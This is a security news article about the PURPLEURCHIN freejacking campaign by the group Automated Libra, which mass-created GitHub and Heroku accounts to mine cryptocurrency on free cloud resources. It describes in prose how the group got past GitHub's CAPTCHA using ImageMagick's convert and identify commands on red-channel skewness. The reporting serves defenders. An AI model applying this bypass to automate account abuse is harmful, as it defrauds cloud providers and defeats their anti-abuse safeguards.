Jan 06, 2023Ravie Lakshmanan
A South Africa-based threat actor known as Automated Libra has
been observed employing CAPTCHA bypass techniques to create GitHub
accounts in a programmatic fashion as part of a freejacking
campaign dubbed PURPLEURCHIN.
The group “primarily targets cloud platforms offering
limited-time trials of cloud resources in order to perform their
crypto mining operations,” Palo Alto Networks Unit 42 researchers
William Gamazo and Nathaniel Quist said[1].
PURPLEURCHIN first came to light in October 2022 when Sysdig
disclosed[2]
that the adversary created as many as 30 GitHub accounts, 2,000
Heroku accounts, and 900 Buddy accounts to scale its operation.
Now according to Unit 42, the cloud threat actor group created
three to five GitHub accounts every minute at the height of its
activity in November 2022, totally setting up over 130,000 bogus
accounts across Heroku, Togglebox, and GitHub.
More than 22,000 GitHub accounts are estimated to have been
created between September and November 2022, three in September,
1,652 in October, and 20,725 in November. A total of 100,723 unique
Heroku accounts have also been identified.
The cybersecurity company also termed the abuse of cloud
resources as a “play and run” tactic designed to avoid paying the
platform vendor’s bill by making use of falsified or stolen credit
cards to create premium accounts.
Its analysis of 250GB of data puts the earliest sign of the
crypto campaign at least nearly 3.5 years ago in August 2019,
identifying the use of more than 40 wallets and seven different
cryptocurrencies.
The core idea that undergirds PURPLEURCHIN is the exploitation
of computational resources allocated to free and premium accounts
on cloud services in order to reap monetary profits on a massive
scale before losing access for non-payment of dues.
Besides automating the account creation process by leveraging
legitimate tools like xdotool[3]
and ImageMagick[4], the threat actor has
also been found to take advantage of weakness within the CAPTCHA
check on GitHub to further its illicit objectives.
This is accomplished by using ImageMagick’s convert command[5]
to transform the CAPTCHA images to their RGB complements, followed
by using the identify command[6]
to extract the skewness of the red channel[7]
and selecting the smallest value.
Once the account creation is successful, Automated Libra
proceeds to create a GitHub repository and deploys workflows[8]
that make it possible to launch external Bash scripts and
containers for initiating the crypto mining functions.
The findings illustrate how the freejacking campaign can be
weaponized to maximize returns by increasing the number of accounts
that can be created per minute on these platforms.
“It is important to note that Automated Libra designs their
infrastructure to make the most use out of CD/CI tools,” the
researchers concluded.
“This is getting easier to achieve over time, as the traditional
VSPs are diversifying their service portfolios to include
cloud-related services. The availability of these cloud-related
services makes it easier for threat actors, because they don’t have
to maintain infrastructure to deploy their applications.”
Found this article interesting? Follow us on Twitter [9]
and LinkedIn[10] to read more exclusive
content we post.
References
- ^
said
(unit42.paloaltonetworks.com) - ^
disclosed
(thehackernews.com) - ^
xdotool
(www.semicomplete.com) - ^
ImageMagick
(imagemagick.org) - ^
convert
command (imagemagick.org) - ^
identify
command (imagemagick.org) - ^
red
channel (en.wikipedia.org) - ^
deploys
workflows (docs.github.com) - ^
Twitter
(twitter.com) - ^
LinkedIn
(www.linkedin.com)
Read more https://thehackernews.com/2023/01/hackers-using-captcha-bypass-tactics-in.html
Latest News
- Michael Jackson, Olodum and the Yoruba Connection ! October 27, 2025
- The 7 Stages of British Decline — From Empire to Middle Power October 27, 2025
- NDLEA uncovers UK-bound cocaine in cream containers, Meth in water heater October 27, 2025
